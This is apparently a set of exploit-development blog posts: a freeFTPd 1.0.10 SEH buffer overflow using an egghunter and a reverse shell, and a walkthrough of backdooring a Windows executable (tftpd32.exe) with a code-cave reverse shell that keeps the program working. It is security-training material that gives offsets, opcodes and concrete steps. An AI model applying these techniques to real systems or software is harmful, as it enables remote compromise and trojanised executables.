0x7 - Shellcode time!

I created a calc shellcode to see if we are able to pop a shellcode.


We go through our egghunter and add a breakpoint right before the jmp edi instruction and we can see that edi points to the beginning of our calc shellcode



Everything looks good, however, our shellcode just keeps on crashing the program and not spawn a calc.exe

After spending research, it looks like the ESP has to be realigned.

We align ESP with the address of EDX....then make it divisible by 4

PUSH EDX
POP ESP
AND, ESP FFFFFFF0             ----> make ESP divisible by 4




I update the shellcode to a reverse shell…pop the exploit one more time and we get a reverse shell





Final POC in my GitHub.

Thanks for reading!

freeFTPd-1.0.10 SEH Based Buffer Overflow

Kali Linux
Windows Vista
freeFTPD 1.0.10

Original Author, POC, and vulnerable software: https://www.exploit-db.com/exploits/27747


~~~~~~//******//~~~~~~

Vulnerable program:




Initial Proof-of-Concept 


...and we get our initial crash where our SEH handler and nSEH have been overwritten with 41s.



Calculating the offset values

As usual, we use Metasploit's pattern _create.rb and pattern_offset.rb




We update our POC with the following offset values


...and we verify that we hit the correct offset values as shown with the Cs and Bs


POP-POP-RET 


Since this a SEH based buffer overflow, as usual we will need a POP-POP-RET address.

I am using mona.py to find this address.

Also, note that we will need to find an address that SAFESEH and ASLR disabled.

We will use address 0x0041B865



Again, we update our POC with our SEH Handler redirect address


We send our exploit up and we have successfully redirected code execution as we hit our POP-POP-RET address.


We follow the POP-POP-RET and we hit our nSEH which is just right below our As

Note: We currently do not see our Ds.


...however, if we scroll further down, we can see that our Ds are still loaded in memory. Just need find them...aka. egghunter.


First Jump

Since our first jump is limited to just 4 bytes, we will do a 2 byte reverse short jmp

EB 80 or jmp short reverse 128 bytes.

We update our nSEH with EB 80 and added 2 more NOPs (not necessary) to complete the 4 bytes.



We fire up the POC on more time, take the pop-pop-ret, and hit our first jump



Restricted characters 


After going through the 256 hex characters, we found that 0xa is the only restricted character

So far, we have accomplished the following:

1. Successfully crash the program and overwrite the SEH and nSEH
2. Calculated the offset values
3. Found POP-POP-RET address
4. Completed the first jump from nSEH which allows 127 bytes of address space


Egg...hunting!


Reminder...you can create an egghunter using mona.py


Note: I am using a slightly different egghunter shellcode.

We update our POC with our egghunter shellcode and add the egg in front of our Ds



Send the exploit up...take the first jump (EB 80) and we land on our NOP sled.

If we scroll down, our egghunter is just right below our the NOP sled.

We let the egghunter execute while adding a breakpoint at JMP EDI to check the value of EDI.

Here we can see that we have successfully located our egg...all that we need to do now is add our reverse shellcode right after our egg.


At this point we are ready to add our reverse shell





Portable Executable (PE) backdooring and Address Space Layout Randomization (ASLR)

This blog will go over on how to backdoor windows executable.  The intent is to show how a windows PE can be hijacked and introduced a reverse shell while still allowing the executable to maintain its functionality. We will go over how ASLR provides  security feature that randomises the base address of executables/DLLs and positions of other memory segments like stack and heap. This prevents exploits from reliably jumping to a certain function/piece of code. 

This is why you shouldn't trust any executables that you are introducing to your system without verifying its source or checksum.

References:

Address Space Layout Randomization (ASLR): https://en.wikipedia.org/wiki/Address_space_layout_randomization  

Executables:
tftpd32.exe - is free, open-source TFTP server that is also includes a variety of different services, including DHCP, TFTP, DNS, and even syslog and functions as a TFTP Client as well
PsExec.exe - is a command-line tool that lets you execute processes on remote systems and redirect console applications' output to the local system so that these applications appear to be running locally. 

Tools:

Immunity Debugger (http://debugger.immunityinc.com/ID_register.py) 
LordPE (http://www.malware-analyzer.com/pe-tools) 
XVI32 (http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm)

~~~~~~~~~//*******//~~~~~~~~~

0x0 - Adding a New Section...Code Cave

There are basically two (or more?) ways to get a code cave (1) Find available address space and (2) add a new executable section.

"The concept of a code cave is often employed by hackers and reverse engineers to execute arbitrary code in a compiled program. It can be a helpful method to make modifications to a compiled program in the example of including additional dialog boxes, variable modifications or even the removal of software key validation checks. Often using a call instruction commonly found on many CPU architectures, the code jumps to the new subroutine and pushes the next address onto the stack. After execution of the subroutine a return instruction can be used to pop the previous location off of the stack into the program counter. This allows the existing program to jump to the newly added code without making significant changes to the program flow itself."

(1) Finding a code cave using backdoor-factory

(2) Using LordPE to add a new executable section.


For this blog, we will add a new section. As seen above, I added a section with 1000 virtual size, raw size 400. Also note that virtual offset is 0004B000 as we will need this value to calculate the Relative Value Address (RVA). Since ASLR is enabled, we will use RVA in order to dynamically do our jumps and address redirections.

0x1 - Entry point and New Section address

Using immunity debugger, we get the address of the new section (from this on this will be called code cave)

We can see that the address is currently pointing to 010AB000, however, the 2 higher-bytes of the adressare irrelevant due to ASLR.


We can see the entry point once we open up tftpd32.exe in immunity debugger and verify the memoy map. We will be hijacking the first instruction to make the jump to our code cave. Also, note that we will need to reintroduce these two instructions after the backdoor.


If ASLR was not enabled, we could have easily done a jmp 010AB000. That said, we will need to do some calculations to always hit the code cave regardless if its address is randomized.
To calculate the RVA, we will need the virtual offset and the entry point.



4B000 (VOffset) - 1208C (EntryPoint) = 3 8F74. This mean that we will do a jmp 38F74. 

Using nasm_shell.rb, we generate the following opcodes.


Our first instruction will be updated with E9 6F8F0300 which will do a jump to our code cave.


...if we reload the program, ASLR kicks in as we can see the higher 2 bytes have changed. The same opcodes but different address.


We take the jump and it lands us to the beginning of our code cave.


0x2 - Backdoor/Reverse Shell Code

Once in our code cave, we will add a Metasploit reverse shellcode

We will create the payload in hex format and binary copy it to the program using immunity debugger.


Before the reverse shell can be copied, all the registers and flags have to be said which can be done with PUSHAD and PUSHFD instructions. This is needed to maintain the integrity of the original program execution.


Once reverse shellcode is added, registers and flags are restored to their original state using POPFD and POPAD. However before that, we need to adjust the value of ESP to point it to the original stack/ESP value. 

In my case, here are the ESP values

Before shellcode: 0025F908
After shellcode: 0025F70C


We will need to add 1FC to the ESP to align it, then execute the POPFD and POPAD instructions to restore the registers and flags


At this point, if we add a breakpoint at the end of our shellcode and run the program...we should get a reverse shell to our Kali netcat listener.

As you can see that we have successfully hijacked code execution and redirected it to our code cave containing our reverse shellcode.

0x3 - Restoring Original Program Instructions

Remember the two instruction at the entry point before they were hijacked.? We will now need to restore these two instructions so the program can run as intended.


Keep in mind that we are still dealing with ASLR which means we will need calculate the RVA once again.

0096 BF15 - 0095 0000 = RVA 1 BF15 (this will be our CALL RVA_1 BF15) (additional offset by 10000)

0096 2091 - 0095 0000 = RVA 1 2091 (this will be our JMP RVA_1 2091)  (additional offset by 10000)


At address 010AB169 or RVA 4B169 (virtual offset + 169)

 

RVA_4B169 - RVA_1 BF15 



At address 010AB16E or RVA 4B16E (virtual offset + 16E)


RVA_4B16E- RVA_1 2091




Add these instructions or opcodes as shown below:


And we are done...somewhat.

0x4 - WaitForSingleObject

Our reverse shell calls the WaitForSingleObject function which pushes an ESI value of -1. As a result, tftpd32.exe will not execute until we exit the reverse shell. This mean that we will need to change the ESI value from -1 to 0.

We will trace code execution in immunity debugger using 'Trace Over' command.

Line 5 has DEC ESI instructions which makes ESI = FFFFFFFF. This means that all we need to do is cancel the DEC ESI instructions (making it NOP works just fine)!  




We should now be able to successfully execute the program while it also simultaneously sends a reverse shell to Kali.



Thanks for reading.

❌
❌